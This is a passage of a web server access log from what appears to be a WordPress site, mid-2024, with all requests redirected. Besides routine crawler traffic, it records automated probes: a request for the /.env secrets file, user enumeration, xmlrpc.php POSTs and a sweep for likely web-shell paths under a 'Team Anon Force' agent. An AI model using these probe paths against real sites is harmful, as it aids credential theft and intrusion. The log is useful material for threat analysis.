/telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 138.197.191.87 - - [20/Jul/2024:10:18:05 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 34.123.170.104 - - [20/Jul/2024:10:19:04 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36" 205.169.39.7 - - [20/Jul/2024:10:19:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 205.169.39.235 - - [20/Jul/2024:10:19:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.235 - - [20/Jul/2024:10:19:44 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 152.42.174.176 - - [20/Jul/2024:12:37:35 +0700] "GET /wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 152.42.174.176 - - [20/Jul/2024:12:37:38 +0700] "GET /wordpress/wp-admin/setup-config.php?step=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J111F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36" 207.241.236.83 - - [21/Jul/2024:16:08:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/ae4878c warc/v0.8.39" 205.210.31.10 - - [21/Jul/2024:21:15:45 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 68.183.96.223 - - [22/Jul/2024:01:15:06 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 206.168.34.221 - - [23/Jul/2024:08:34:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 147.185.132.55 - - [23/Jul/2024:11:20:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 88.173.222.130 - - [23/Jul/2024:13:59:53 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 167.172.149.104 - - [24/Jul/2024:01:27:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 79.110.62.224 - - [24/Jul/2024:15:17:55 +0700] "GET /xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.115 Safari/537.36" 206.168.34.199 - - [25/Jul/2024:15:52:54 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 198.235.24.236 - - [26/Jul/2024:02:09:36 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.53 - - [28/Jul/2024:07:16:02 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 205.210.31.66 - - [30/Jul/2024:06:51:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 54.88.179.33 - - [01/Aug/2024:10:06:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 194.233.64.75 - - [01/Aug/2024:22:49:19 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 43.142.194.216 - - [02/Aug/2024:03:14:04 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 43.142.194.216 - - [02/Aug/2024:03:14:09 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 43.142.194.216 - - [02/Aug/2024:03:14:13 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 147.182.150.111 - - [02/Aug/2024:18:29:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 87.236.176.7 - - [02/Aug/2024:21:52:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 194.59.31.17 - - [06/Aug/2024:23:26:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" 54.148.204.57 - - [09/Aug/2024:23:13:44 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js HTTP/1.1" 301 162 "-" "W3C_Validator/1.654" 54.148.204.57 - - [09/Aug/2024:23:14:00 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 8.0.0; HWI-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36" 54.148.204.57 - - [09/Aug/2024:23:14:28 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 8T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36" 205.169.39.12 - - [10/Aug/2024:10:10:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 178.33.250.124 - - [13/Aug/2024:02:36:36 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 103.47.185.185 - - [16/Aug/2024:05:28:47 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.47.185.185 - - [16/Aug/2024:05:28:51 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.47.185.185 - - [16/Aug/2024:05:28:55 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 165.22.121.129 - - [16/Aug/2024:13:28:06 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 162.142.125.217 - - [17/Aug/2024:01:51:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 185.250.193.51 - - [18/Aug/2024:01:04:15 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 145.220.91.19 - - [18/Aug/2024:20:17:35 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 66.249.71.199 - - [18/Aug/2024:21:46:59 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.68.36 - - [18/Aug/2024:21:47:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 205.210.31.54 - - [19/Aug/2024:03:17:25 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 206.168.34.222 - - [20/Aug/2024:06:58:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 210.245.54.117 - - [20/Aug/2024:09:54:31 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 210.245.54.117 - - [20/Aug/2024:09:54:35 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 210.245.54.117 - - [20/Aug/2024:09:54:43 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 143.244.134.222 - - [20/Aug/2024:17:40:53 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 39.105.223.219 - - [20/Aug/2024:17:40:56 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 35.87.223.221 - - [21/Aug/2024:17:14:11 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)" 45.117.171.134 - - [22/Aug/2024:01:10:36 +0700] "GET /?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" 92.53.96.159 - - [22/Aug/2024:01:10:38 +0700] "GET /?author=31 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 64.227.78.129 - - [22/Aug/2024:01:10:38 +0700] "GET /?author=21 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1" 190.219.102.212 - - [22/Aug/2024:01:11:11 +0700] "GET /?author=41 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 178.33.250.142 - - [22/Aug/2024:01:11:13 +0700] "GET /?author=21 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" 154.26.137.162 - - [22/Aug/2024:01:11:54 +0700] "GET /?author=11 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 54.88.179.33 - - [22/Aug/2024:04:46:40 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 193.19.109.47 - - [24/Aug/2024:03:52:03 +0700] "GET /?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 193.19.109.47 - - [24/Aug/2024:03:52:04 +0700] "GET /wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 193.19.109.47 - - [24/Aug/2024:03:52:05 +0700] "POST /xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 193.19.109.47 - - [24/Aug/2024:03:52:05 +0700] "POST /xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 91.206.200.94 - - [25/Aug/2024:12:17:36 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.206.200.94 - - [25/Aug/2024:12:17:40 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.206.200.94 - - [25/Aug/2024:12:17:43 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.148.10.59 - - [25/Aug/2024:21:59:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9" 198.235.24.30 - - [26/Aug/2024:22:25:42 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 92.204.139.118 - - [28/Aug/2024:08:16:53 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 92.204.139.118 - - [28/Aug/2024:08:16:58 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 92.204.139.118 - - [28/Aug/2024:08:17:02 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 143.198.33.142 - - [29/Aug/2024:03:29:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 167.172.40.218 - - [30/Aug/2024:20:38:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 167.71.246.179 - - [31/Aug/2024:03:24:07 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 198.235.24.151 - - [01/Sep/2024:02:28:01 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 66.249.68.36 - - [01/Sep/2024:23:19:25 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.71.200 - - [01/Sep/2024:23:19:26 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 147.185.132.204 - - [03/Sep/2024:20:09:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 3.249.229.215 - - [04/Sep/2024:02:20:16 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 34.0.64.141 - - [04/Sep/2024:15:47:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36" 35.246.90.224 - - [05/Sep/2024:00:14:06 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 92.53.96.113 - - [05/Sep/2024:01:03:24 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" 66.179.248.145 - - [05/Sep/2024:17:07:35 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 34.143.175.179 - - [06/Sep/2024:00:18:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 34.38.252.56 - - [06/Sep/2024:05:00:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 4.240.106.137 - - [06/Sep/2024:07:01:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 103.120.176.210 - - [06/Sep/2024:08:05:40 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.120.176.210 - - [06/Sep/2024:08:05:43 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 103.120.176.210 - - [06/Sep/2024:08:05:46 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 34.94.208.54 - - [07/Sep/2024:03:46:36 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 198.235.24.14 - - [07/Sep/2024:09:07:08 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.22 - - [08/Sep/2024:05:20:33 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 35.171.144.152 - - [08/Sep/2024:12:09:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 35.171.144.152 - - [08/Sep/2024:14:28:17 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 45.132.227.65 - - [08/Sep/2024:21:43:20 +0700] "GET /?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 45.132.227.65 - - [08/Sep/2024:21:43:21 +0700] "GET /wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 45.132.227.65 - - [08/Sep/2024:21:43:22 +0700] "POST /xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 45.132.227.65 - - [08/Sep/2024:21:43:22 +0700] "POST /xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:07:21:12 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:04 +0700] "GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:06 +0700] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:17 +0700] "GET /defaults.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:17 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:19 +0700] "GET /wp-admin/user/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:24 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:25 +0700] "GET /wp-includes/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:28 +0700] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:30 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:33 +0700] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:40 +0700] "GET /wp-admin/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:43 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:34:57 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:12:35:07 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [09/Sep/2024:13:21:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 68.183.226.121 - - [09/Sep/2024:17:21:16 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:17 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:18 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:19 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:20 +0700] "GET /chosen.php?p= HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:22 +0700] "GET /mah.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:23 +0700] "GET /wp-admin/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:25 +0700] "GET /wp-content/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force" 68.183.226.121 - - [09/Sep/2024:17:21:26 +0700] "GET /wp-admin/install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 